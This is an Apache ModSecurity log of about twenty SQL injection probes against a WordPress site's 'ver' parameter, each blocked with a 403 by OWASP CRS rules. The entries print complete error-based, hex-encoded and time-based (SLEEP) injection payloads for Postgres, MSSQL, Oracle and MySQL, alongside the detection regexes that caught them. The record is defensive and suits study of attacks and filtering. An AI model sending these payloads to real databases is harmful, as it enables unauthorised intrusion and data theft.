Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:ver: 1.8.5.47%' AND 7826=CAST((CHR(113)||CHR(122)||CHR(107)||CHR(118)||CHR(113))||(SELECT (CASE WHEN (7826=7826) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(122)||CHR(120)||CHR(122)||CHR(113)) AS NUMERIC) AND '%'='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1lg1VuGGNTxm_kiOEogAAAM8"] [Sat Aug 31 01:17:58.572370 2024] [:error] [pid 8676:tid 140590402475776] [client 193.29.13.20:37664] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:ver: 1.8.5.47 AND 7826=CAST((CHR(113)||CHR(122)||CHR(107)||CHR(118)||CHR(113))||(SELECT (CASE WHEN (7826=7826) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(122)||CHR(120)||CHR(122)||CHR(113)) AS NUMERIC)-- ILew"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1lmm8LEssXUq6wJ2LJgAAAIo"] [Sat Aug 31 01:17:58.878240 2024] [:error] [pid 8676:tid 140590293370624] [client 193.29.13.20:37666] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: CONVERT( found within ARGS:ver: 1.8.5.47) AND 1499=CONVERT(INT,(SELECT CHAR(113) CHAR(122) CHAR(107) CHAR(118) CHAR(113) (SELECT (CASE WHEN (1499=1499) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(113) CHAR(122) CHAR(120) CHAR(122) CHAR(113))) AND (4282=4282"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1lmm8LEssXUq6wJ2LJwAAAJc"] [Sat Aug 31 01:17:59.185697 2024] [:error] [pid 8676:tid 140590394083072] [client 193.29.13.20:37668] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: CONVERT( found within ARGS:ver: 1.8.5.47 AND 1499=CONVERT(INT,(SELECT CHAR(113) CHAR(122) CHAR(107) CHAR(118) CHAR(113) (SELECT (CASE WHEN (1499=1499) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(113) CHAR(122) CHAR(120) CHAR(122) CHAR(113)))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1l2m8LEssXUq6wJ2LKAAAAIs"] [Sat Aug 31 01:17:59.491632 2024] [:error] [pid 9366:tid 140590419261184] [client 193.29.13.20:37670] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: CONVERT( found within ARGS:ver: 1.8.5.47') AND 1499=CONVERT(INT,(SELECT CHAR(113) CHAR(122) CHAR(107) CHAR(118) CHAR(113) (SELECT (CASE WHEN (1499=1499) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(113) CHAR(122) CHAR(120) CHAR(122) CHAR(113))) AND ('veUw'='veUw"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1lw1VuGGNTxm_kiOEowAAAMg"] [Sat Aug 31 01:17:59.797666 2024] [:error] [pid 9366:tid 140590335334144] [client 193.29.13.20:37672] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: CONVERT( found within ARGS:ver: 1.8.5.47' AND 1499=CONVERT(INT,(SELECT CHAR(113) CHAR(122) CHAR(107) CHAR(118) CHAR(113) (SELECT (CASE WHEN (1499=1499) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(113) CHAR(122) CHAR(120) CHAR(122) CHAR(113))) AND 'qnvt'='qnvt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1lw1VuGGNTxm_kiOEpAAAANI"] [Sat Aug 31 01:18:00.102228 2024] [:error] [pid 9366:tid 140590556882688] [client 193.29.13.20:37674] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: CONVERT( found within ARGS:ver: 1.8.5.47%' AND 1499=CONVERT(INT,(SELECT CHAR(113) CHAR(122) CHAR(107) CHAR(118) CHAR(113) (SELECT (CASE WHEN (1499=1499) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(113) CHAR(122) CHAR(120) CHAR(122) CHAR(113))) AND '%'='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1mA1VuGGNTxm_kiOEpQAAAMA"] [Sat Aug 31 01:18:00.406418 2024] [:error] [pid 8672:tid 140590385690368] [client 193.29.13.20:37676] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: CONVERT( found within ARGS:ver: 1.8.5.47 AND 1499=CONVERT(INT,(SELECT CHAR(113) CHAR(122) CHAR(107) CHAR(118) CHAR(113) (SELECT (CASE WHEN (1499=1499) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(113) CHAR(122) CHAR(120) CHAR(122) CHAR(113)))-- ExSm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1mA3r8UJC0kxJCKSq5gAAAAw"] [Sat Aug 31 01:18:00.701657 2024] [:error] [pid 8676:tid 140590377297664] [client 193.29.13.20:37678] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:ver: 1.8.5.47) AND 3700=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(122)||CHR(107)||CHR(118)||CHR(113)||(SELECT (CASE WHEN (3700=3700) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(120)||CHR(122)||CHR(113)||CHR(62))) FROM DUAL) AND (3397=3397"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1mGm8LEssXUq6wJ2LKQAAAI0"] [Sat Aug 31 01:18:01.011681 2024] [:error] [pid 9366:tid 140590326941440] [client 193.29.13.20:37680] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:ver: 1.8.5.47 AND 3700=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(122)||CHR(107)||CHR(118)||CHR(113)||(SELECT (CASE WHEN (3700=3700) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(120)||CHR(122)||CHR(113)||CHR(62))) FROM DUAL)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1mQ1VuGGNTxm_kiOEpgAAANM"] [Sat Aug 31 01:18:01.328062 2024] [:error] [pid 8672:tid 140590368904960] [client 193.29.13.20:37682] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:ver: 1.8.5.47') AND 3700=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(122)||CHR(107)||CHR(118)||CHR(113)||(SELECT (CASE WHEN (3700=3700) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(120)||CHR(122)||CHR(113)||CHR(62))) FROM DUAL) AND ('zgov'='zgov"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1mQ3r8UJC0kxJCKSq5wAAAA4"] [Sat Aug 31 01:18:01.636430 2024] [:error] [pid 8672:tid 140590318548736] [client 193.29.13.20:37684] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:ver: 1.8.5.47' AND 3700=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(122)||CHR(107)||CHR(118)||CHR(113)||(SELECT (CASE WHEN (3700=3700) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(120)||CHR(122)||CHR(113)||CHR(62))) FROM DUAL) AND 'KQFG'='KQFG"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1mQ3r8UJC0kxJCKSq6AAAABQ"] [Sat Aug 31 01:18:01.944580 2024] [:error] [pid 8675:tid 140590548489984] [client 193.29.13.20:37686] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:ver: 1.8.5.47%' AND 3700=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(122)||CHR(107)||CHR(118)||CHR(113)||(SELECT (CASE WHEN (3700=3700) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(120)||CHR(122)||CHR(113)||CHR(62))) FROM DUAL) AND '%'='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1mZdLCjsWrLhZKAOZawAAAEE"] [Sat Aug 31 01:18:02.249015 2024] [:error] [pid 9366:tid 140590394083072] [client 193.29.13.20:37688] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:ver: 1.8.5.47 AND 3700=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(122)||CHR(107)||CHR(118)||CHR(113)||(SELECT (CASE WHEN (3700=3700) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(120)||CHR(122)||CHR(113)||CHR(62))) FROM DUAL)-- PEwK"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1mg1VuGGNTxm_kiOEpwAAAMs"] [Sat Aug 31 01:18:02.555706 2024] [:error] [pid 9366:tid 140590427653888] [client 193.29.13.20:37690] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\A|[^\\\\d])0x[a-f\\\\d]{3,}[a-f\\\\d]*)+" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "55"] [id "981260"] [rev "2"] [msg "SQL Hex Encoding Identified"] [data "Matched Data: (0x717a6b7671 found within ARGS:ver: (SELECT 3447 FROM(SELECT COUNT(*),CONCAT(0x717a6b7671,(SELECT (ELT(3447=3447,1))),0x717a787a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1mg1VuGGNTxm_kiOEqAAAAMc"] [Sat Aug 31 01:18:02.866385 2024] [:error] [pid 9366:tid 140590352119552] [client 193.29.13.20:37692] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\A|[^\\\\d])0x[a-f\\\\d]{3,}[a-f\\\\d]*)+" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "55"] [id "981260"] [rev "2"] [msg "SQL Hex Encoding Identified"] [data "Matched Data: (0x717a6b7671 found within ARGS:ver: (SELECT CONCAT(0x717a6b7671,(SELECT (ELT(1082=1082,1))),0x717a787a71))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1mg1VuGGNTxm_kiOEqQAAANA"] [Sat Aug 31 01:18:03.194647 2024] [:error] [pid 9366:tid 140590548489984] [client 193.29.13.20:37694] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:ver: (SELECT (CHR(113)||CHR(122)||CHR(107)||CHR(118)||CHR(113))||(SELECT (CASE WHEN (2138=2138) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(122)||CHR(120)||CHR(122)||CHR(113)))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1mw1VuGGNTxm_kiOEqgAAAME"] [Sat Aug 31 01:18:03.502358 2024] [:error] [pid 8675:tid 140590540097280] [client 193.29.13.20:37696] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: CHAR( found within ARGS:ver: (SELECT CHAR(113) CHAR(122) CHAR(107) CHAR(118) CHAR(113) (SELECT (CASE WHEN (8067=8067) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(113) CHAR(122) CHAR(120) CHAR(122) CHAR(113))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1m5dLCjsWrLhZKAOZbAAAAEI"] [Sat Aug 31 01:18:03.808097 2024] [:error] [pid 9366:tid 140590301763328] [client 193.29.13.20:37700] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:ver: 1.8.5.47);SELECT SLEEP(5)#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1mw1VuGGNTxm_kiOEqwAAANY"] 